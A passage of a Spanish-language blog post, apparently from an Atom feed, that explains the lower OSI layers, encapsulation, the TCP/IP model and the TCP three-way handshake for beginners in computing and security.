utilizan para ordenar las redes, categorizarlas y permitirnos ordenarlas adecuadamente.
Actualmente, la forma más común de direccionamiento lógico es el formato IPV4, con el
que probablemente ya esté familiarizado (es decir, 192.168.1.1 es una dirección común
para un enrutador doméstico).&lt;/p&gt;

&lt;h2 id=&quot;capa-2---enlace&quot;&gt;Capa 2 - Enlace&lt;/h2&gt;

&lt;p&gt;La capa de enlace de datos se centra en el direccionamiento físico de la transmisión.
Recibe un paquete de la capa de red (que incluye la dirección IP de la PC
remota) y agrega la dirección física (MAC) del punto final receptor. Dentro de cada
PC habilitada para red hay una tarjeta de interfaz de red (NIC) que viene con
una dirección MAC (control de acceso a medios) única para identificarla.
Las direcciones MAC son establecidas por el fabricante y literalmente grabadas en la 
tarjeta; no se pueden cambiar, aunque se pueden falsificar. Cuando se envía información 
a través de una red, en realidad es la dirección física la que se utiliza para identificar 
dónde exactamente enviar la información.
Además, también es trabajo de la capa de enlace de datos presentar los datos en un 
formato adecuado para la transmisión.
La capa de enlace de datos también cumple una función importante cuando recibe datos, 
ya que verifica la información recibida para asegurarse de que no se haya corrompido 
durante la transmisión, lo que bien podría suceder cuando los datos son transmitidos por 
la capa 1: la capa física.&lt;/p&gt;

&lt;h2 id=&quot;capa-1---física&quot;&gt;Capa 1 - Física&lt;/h2&gt;

&lt;p&gt;La capa física se reduce al hardware del ordenador. Aquí es donde se envían y
reciben los pulsos eléctricos que componen la transferencia de datos a través de una red.
El trabajo de la capa física es convertir los datos binarios de la transmisión en señales y
transmitirlos a través de la red, así como recibir señales entrantes y convertirlas
nuevamente en datos binarios.&lt;/p&gt;

&lt;h1 id=&quot;encapsulación&quot;&gt;Encapsulación&lt;/h1&gt;

&lt;p&gt;A medida que los datos se transmiten por cada capa del modelo, al inicio de la
transmisión se agrega más información que contiene detalles específicos de la capa en
cuestión. Como ejemplo, el encabezado agregado por la capa de red incluiría cosas como
las direcciones IP de origen y destino, y el encabezado agregado por la capa de
transporte incluiría (entre otras cosas) información específica del protocolo que se está
utilizando. La capa de enlace de datos también agrega una parte al final de la transmisión,
que se utiliza para verificar que los datos no se hayan corrompido durante la transmisión;
esto también tiene la ventaja adicional de una mayor seguridad, ya que los datos no
pueden ser interceptados y manipulados sin romper el tráiler. Todo este proceso se
denomina encapsulación; el proceso mediante el cual los datos se pueden enviar de una
PC a otra.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/explicacion-del-modelo-osi/osi-diagram.jpeg&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Observa que los datos encapsulados reciben un nombre diferente en diferentes pasos del
proceso. En las capas 7, 6 y 5, los datos se denominan simplemente datos. En la capa de
transporte, los datos encapsulados se denominan segmento o datagrama (dependiendo
de si se ha seleccionado TCP o UDP como protocolo de transmisión). En la capa de red,
los datos se denominan paquete. Cuando el paquete pasa a la capa de enlace de datos,
se convierte en una trama y, cuando se transmite a través de una red, la trama se ha
dividido en bits.&lt;/p&gt;

&lt;p&gt;Cuando el mensaje es recibido por el segundo ordenador, invierte el proceso,
comenzando en la capa física y trabajando hasta llegar a la capa de aplicación,
eliminando la información agregada a medida que avanza. Esto se conoce como
desencapsulación. Como tal, puede pensar que las capas del modelo OSI existen dentro
de cada PC con capacidades de red. Si bien en la práctica no es tan claro,
todas los ordenadores siguen el mismo proceso de encapsulación para enviar datos y
desencapsularlos al recibirlos.&lt;/p&gt;

&lt;p&gt;Los procesos de encapsulación y desencapsulación son muy importantes, no solo por su
uso práctico, sino también porque nos brindan un método estandarizado para enviar
datos. Esto significa que todas las transmisiones seguirán constantemente la mismametodología, lo que permitirá que cualquier dispositivo habilitado para la red envíe una
solicitud a cualquier otro dispositivo accesible y se asegure de que se entenderá,
independientemente de que sean del mismo fabricante; utilizar el mismo sistema
operativo; o cualquier otro factor&lt;/p&gt;

&lt;h1 id=&quot;el-modelo-tcpip&quot;&gt;El modelo TCP/IP&lt;/h1&gt;

&lt;p&gt;El modelo TCP / IP es, en muchos sentidos, muy similar al modelo OSI. Es unos años
más antiguo y sirve como base para la creación de redes en el mundo real. El modelo
TCP / IP consta de cuatro capas: aplicación, transporte, Internet e interfaz de red. Entre
ellos, cubren la misma gama de funciones que las siete capas del modelo OSI.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Aplicacion&lt;/li&gt;
  &lt;li&gt;Transporte&lt;/li&gt;
  &lt;li&gt;Internet&lt;/li&gt;
  &lt;li&gt;Interfaz de red&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nota: Algunas fuentes recientes dividen el modelo TCP / IP en cinco capas, dividiendo la
capa de interfaz de red en capas de enlace de datos y física (como con el modelo OSI).
Esto es aceptado y bien conocido; sin embargo, no está definido oficialmente (a diferencia
de las cuatro capas originales que se definen en RFC1122).&lt;/p&gt;

&lt;p&gt;A estas alturas(si es que llegaste aquí sin salir) te estarás preguntando porque te solté todo el rollo del modelo OSI si en realidad no se usa para nada en el mundo real. La respuesta es sencilla, el modelo OSI(debido a que es menos condensado y más rígido que el modelo TCP/IP) tiende a ser más fácil para aprender la teoría inicial de redes. Bueno una vez aclarado esto continuemos.&lt;/p&gt;

&lt;p&gt;Los dos modelos coinciden con algo como esto:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/explicacion-del-modelo-osi/osi-model-comparation.png&quot; width=&quot;auto&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Los procesos de encapsulación y desencapsulación funcionan exactamente de la misma
manera con el modelo TCP / IP que con el modelo OSI. En cada capa del modelo TCP /
IP se agrega un encabezado durante la encapsulación y se elimina durante la
desencapsulación. Ahora vayamos al lado práctico de las cosas.&lt;/p&gt;

&lt;p&gt;Un modelo en capas es excelente como ayuda visual: nos muestra el proceso general de 
cómo se pueden encapsular y enviar los datos a través de una red, pero ¿cómo sucede 
realmente?
Cuando hablamos de TCP / IP, está muy bien pensar en una tabla con cuatro capas, pero
en realidad estamos hablando de un conjunto de protocolos: conjuntos de reglas que
definen cómo se llevará a cabo una acción. . TCP / IP toma su nombre de los dos más
importantes: el Protocolo de control de transmisión (que mencionamos anteriormente en
el modelo OSI) que controla el flujo de datos entre dos puntos finales, y el Protocolo de
Internet, que controla cómo se direccionan los paquetes. y enviado. Hay muchos más
protocolos que componen la suite TCP / IP; cubriremos algunos de estos en tareas
posteriores. Por ahora, sin embargo, hablemos de TCP.
Como se mencionó anteriormente, TCP es un protocolo basado en conexión. En otras
palabras, antes de enviar datos a través de TCP, primero debe formar una conexión
estable entre las dos PC. El proceso de formación de esta conexión se llama
apretón de manos de tres vías.
Cuando intenta establecer una conexión, su ordenador primero envía una solicitud
especial al servidor remoto indicando que desea inicializar una conexión. Esta solicitud
contiene algo llamado SYN (abreviatura de sincronizar), que esencialmente hace el primer
contacto al iniciar el proceso de conexión. Entonces, el servidor responderá con un
paquete que contiene el bit SYN, así como otro bit de “reconocimiento”, llamado ACK.
Finalmente, su ordenador enviará un paquete que contiene el bit ACK por sí mismo,
confirmando que la conexión se ha configurado correctamente. Con el protocolo de enlace
de tres vías completado con éxito, los datos se pueden transmitir de manera confiable
entre las dos PC. Todos los datos que se pierden o se corrompen en la
transmisión se reenvían, lo que conduce a una conexión que parece no tener pérdidas.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/explicacion-del-modelo-osi/osi-model-work.png&quot; width=&quot;auto&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;No voy a entrar en más detalles sobre como funciona esto paso a paso, con esto es suficiente para entender como funciona, solo nos basta con saber que el protocolo de enlace de tres vías debe llevarse a cabo
antes de que se pueda establecer una conexión mediante TCP.&lt;/p&gt;</content><author><name>shakarr</name></author><category term="Explicaciones" /><category term="Tutoriales" /><category term="Red" /><category term="OSI" /><category term="Capa" /><category term="Internet" /><summary type="html">Entender como funciona la red es uno de los principio basicos para todo aquel que este iniciando en el mundo de la informática, y mas aún, en el mundo de la seguridad informática. En este post aprenderas los conocimiento básicos sobre el modelo OSI y el TCP/IP</summary></entry></feed>